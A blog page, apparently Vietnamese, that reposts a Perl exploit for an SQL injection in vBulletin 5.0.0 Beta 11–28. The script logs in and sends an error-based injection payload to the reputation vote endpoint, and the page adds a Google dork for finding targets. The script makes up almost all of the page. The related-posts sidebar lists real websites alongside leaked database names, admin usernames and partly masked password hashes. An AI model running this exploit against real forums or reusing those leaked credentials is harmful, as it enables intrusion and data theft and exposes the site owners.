J2TEAM Security: A must-have extension for Chrome users. Install now!

vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28 - SQL Injection

vBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28 - SQL Injection | Juno_okyo's Blog
2 min read
# Exploit Title: vBulletin 5 Beta XX SQLi 0day
# Google Dork: "Powered by vBulletin™ Version 5.0.0 Beta"
# Date: 24/03/2013
# Exploit Author: Orestis Kourides
# Vendor Homepage: www.vbulletin.com
# Software Link:
# Version: 5.0.0 Beta 11 - 5.0.0 Beta 28
# Tested on: Linux
# CVE : None



#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;
use MIME::Base64;
system $^O eq 'MSWin32' ? 'cls' : 'clear';
print "
+===================================================+
|           vBulletin 5 Beta XX SQLi 0day           |
|              Author: Orestis Kourides             |
|             Web Site: www.cyitsec.net             |
+===================================================+
";
  
if (@ARGV != 5) {
    print "\r\nUsage: perl vb5exp.pl WWW.HOST.COM VBPATH URUSER URPASS MAGICNUM\r\n";
    exit;
}
  
$host       = $ARGV[0];
$path       = $ARGV[1];
$username   = $ARGV[2];
$password   = $ARGV[3];
$magicnum   = $ARGV[4];
$encpath    = encode_base64('http://'.$host.$path);
print "[+] Logging\n";
print "[+] Username: ".$username."\n";
print "[+] Password: ".$password."\n";
print "[+] MagicNum: ".$magicnum."\n";
print "[+] " .$host.$path."auth/login\n";
my $browser = LWP::UserAgent->new;
my $cookie_jar = HTTP::Cookies->new;
my $response = $browser->post( 'http://'.$host.$path.'auth/login',
    [
        'url' => $encpath,
        'username' => $username,
        'password' => $password,
    ],
    Referer => 'http://'.$host.$path.'auth/login-form?url=http://'.$host.$path.'',
    User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
);
$browser->cookie_jar( $cookie_jar );
my $browser = LWP::UserAgent->new;
$browser->cookie_jar( $cookie_jar );
print "[+] Requesting\n";
my $response = $browser->post( 'http://'.$host.$path.'index.php/ajax/api/reputation/vote',
    [
        'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338',
    ],
    User-Agent => 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0',
);
$data = $response->content;
if ($data =~ /(#((\\.)|[^\\#])*#)/) { print '[+] Version: '.$1 };
print "\n";
exit 1;
Leader at J2TEAM. Website: https://j2team.dev/

Bạn có thể thích những bài đăng này

  • Link error: http://perfumes.sthefani.com.br/miss-elysees-feminino-p-3375'.html 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL serv…
  • Website: http://saigonairbrush.com Database: saigon51_kiban Username: admin | root Password (md5): 0391a388e0dcc1d4a767061cb00***** | 81dc9bdb52d04dc20036dbd8313***** …
  • Link site lỗi: http://www.vinaplast.com.vn/htmls/re...tail.php?id=15 Thêm vào dấu \" ‘ \" phía sau đường link: Trang bị trắng, không có nội dung như bình thường. Chứng tỏ đường …
  • Website: http://thuythi.com Database: thuythi_ducvit  Username: admin Password (md5): e10adc3949ba59abbe56e057f20***** …
  • Website: http://thienminhmobile.com Database: net4g_thienminh Username: admin | phamvan Password (md5): c5aef32b16e6bc0bbed68666f38***** | fb0c02e10cd58b8209b8b140e71***** …
  • Bypass PHP Magic Quotes Ví dụ: Code:"SELECT name, surname FROM users WHERE name='" . $_GET['name'] . "'"Ta có thể by pass bằng back-end DBMS Code:SELECT name, surname FROM user…

Đăng nhận xét

Cảm ơn bạn đã đọc bài viết!

- Bạn có gợi ý hoặc bình luận xin chia sẻ bên dưới.

- Hãy viết tiếng Việt có dấu nếu có thể!